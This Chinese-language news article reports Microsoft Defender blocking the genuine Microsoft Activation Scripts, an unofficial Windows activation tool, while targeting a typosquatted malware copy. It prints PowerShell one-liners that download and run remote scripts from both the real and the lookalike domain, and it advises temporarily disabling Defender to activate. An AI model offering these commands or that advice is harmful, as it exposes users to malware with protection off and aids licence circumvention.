误伤事件：微软Defender在恶意软件防御中拦截官方MAS脚本

微软显然已注意到广受欢迎的开源工具 Microsoft Activation Scripts（MAS），同时也察觉到攻击者注册仿冒域名以 MAS 名义传播恶意软件的行为。为此，微软已部署 Microsoft Defender 自动拦截这些欺诈性激活工具。 然而微软的过滤逻辑出现异常：正版 MAS 工具如今也被错误地纳入拦截范围。用户尝试通过 PowerShell 执行激活命令时会遭遇突发错误。虽然有人质疑这是否为蓄意打压正版工具的行为，但 Microsoft Defender 日志中将该威胁标记为Trojan:PowerShell/FakeMas.DA!MTB。考虑到仿冒脚本的报告最近才出现（且已获 MAS 开发团队在社交媒体证实），微软的本意很可能是针对仿冒版本而非原版工具。

正版与恶意脚本的关键区别

正版脚本与恶意版本的区别仅在于域名中的一个字符：

• 正版 MAS 命令地址为：irm https://get.activated.win | iex恶意版本缺少字母"d"：irm hxxps://get.activate.win | iex微软似乎不慎将正版域名也纳入了黑名单。由于缺乏虚拟测试环境，我们无法立即验证钓鱼版本是否被成功拦截。但若安全软件放行恶意程序却拦截无害的原版工具，将构成极大的讽刺。

  当前解决方案

  由于 Microsoft Defender 默认启用，用户需前往安全中心临时关闭防护才能完成激活。操作完成后应立即恢复防护措施。必须特别强调：操作时需极度警惕域名准确性。若在关闭防护时误执行钓鱼脚本，系统将完全暴露于恶意软件威胁之下，可能导致灾难性数据泄露或其他安全事件。